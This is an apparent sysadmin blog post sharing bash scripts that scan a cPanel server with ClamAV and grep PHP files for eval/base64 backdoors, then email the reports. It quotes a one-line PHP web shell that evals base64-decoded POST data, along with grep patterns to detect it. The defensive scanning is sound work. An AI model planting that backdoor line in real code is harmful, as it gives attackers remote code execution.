clean php files from eval infection
August 16, 2013List incoming live requests
August 26, 2013In order to keep the linux server as safe as possible I wrote two quick bash scripts that will scan for infected files and then send me an email report to take action.
On the server I have centos with whm/cpanel and as antivirus I use clamav. In order to scan the home directories I use:
#!/bin/bash
rm /my/log/file
for i in `awk '!/nobody/{print $2 | "sort | uniq" }' /etc/userdomains | sort | uniq`; do /usr/bin/clamscan --no-summary -i -r /home/$i 2>>/dev/null; done >> /my/log/file
printf "\n" >> /my/log/file
sed -i "1i Subject: Virus Report `date +%m-%d-%Y`" /my/log/file
if [ $? -gt 0 ];
then
/usr/sbin/sendmail -v [email protected] < /my/log/file
fi
now there is another possibility that some php scripts will have something like:
// a recent attack I've seen
if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;}
In the above case the antivirus won't detect the threat.
To overcome this I created a script that will scan the home directory for scripts containing a certain pattern. Then I manually check them to see if everything is ok
#!/bin/bash
rm /my/log/base64eval_output.txt
find /home -type f -name "*.php" -exec grep -l -e "eval(base" -e "eval(gz" {} + >> /my/log/base64eval_output.txt
printf "\n" >> /my/log/base64eval_output.txt
sed -i "1i Subject: PHP eval Report `date +%m-%d-%Y`" /my/log/base64eval_output.txt
/usr/sbin/sendmail -v [email protected] < /my/log/base64eval_output.txt
You can also directly download your files and then enter them in cron like described bellow
base64eval_scan
antivirus_scan
And now the cron:
crontab -e
then add for the last two lines:
0 2 * * 5 /root/scripts/base64eval_scan > /dev/null 2>&1& 0 6 * * * /root/scripts/mails_sent_from_scripts_status > /dev/null 2>&1&
Don't hesitate to let me know if this helped you in some way and of course any improvements / suggestions you may have.
Thank you!
